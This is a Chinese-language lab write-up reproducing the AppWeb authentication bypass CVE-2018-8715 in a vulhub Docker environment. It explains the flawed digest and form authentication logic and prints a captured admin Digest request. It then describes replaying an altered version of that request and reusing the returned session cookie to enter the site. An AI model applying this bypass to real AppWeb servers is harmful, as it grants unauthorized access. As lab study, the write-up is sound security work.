漏洞复现----18、AppWeb 身份验证绕过漏洞 (CVE-2018-8715)

---

一、简介

AppWeb 是基于开源 GPL 协议的嵌入式 Web 服务器，由 Embedthis Software LLC 开发和维护。它是用 C/C++ 编写的，几乎可以在任何现代操作系统上运行。它旨在为嵌入式设备提供一个 Web 应用程序容器。

AppWeb可以配置认证，包括以下三种认证方式：
1、basic：传统的HTTP基本认证；
2、digest：改进了 HTTP 基本身份验证。在此模式下，Cookie 将用于身份验证而不是Authorization标头；
3、form,：基于 HTML 的表单认证。

在7.0.3之前的Appweb版本中，针对digest和form两种认证：
存在与.authCondition函数相关的逻辑缺陷http/httpLib.c。用户传入任意密码，伪造HTTP请求，即可以绕过form和digest登录类型的身份验证。

---

二、漏洞复现

1、启动漏洞环境

执行：docker-compose up -d
访问：IP：8080 

2、以用户名admin登录系统，抓取请求包

GET / HTTP/1.1
Host: 192.168.209.134:8080
Cache-Control: max-age=0
Authorization: Digest username="admin", realm="example.com", nonce="M2UzZjM1NzUxMTZhYmVkNTpleGFtcGxlLmNvbToxN2E0MGViMjE4MTox", uri="/", algorithm=MD5, response="a4963be6a6b2aed3f1496f126bab072c", opaque="799d5", qop=auth, nc=00000002, cnonce="c47d840f80b1fab2"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

我们将请求包更改如下，重放。

3、可以发现返回200，并且获得一个session。

我们将session复制进cookies，便可以进入网站。

---

参考：https://vulhub.org/#/environments/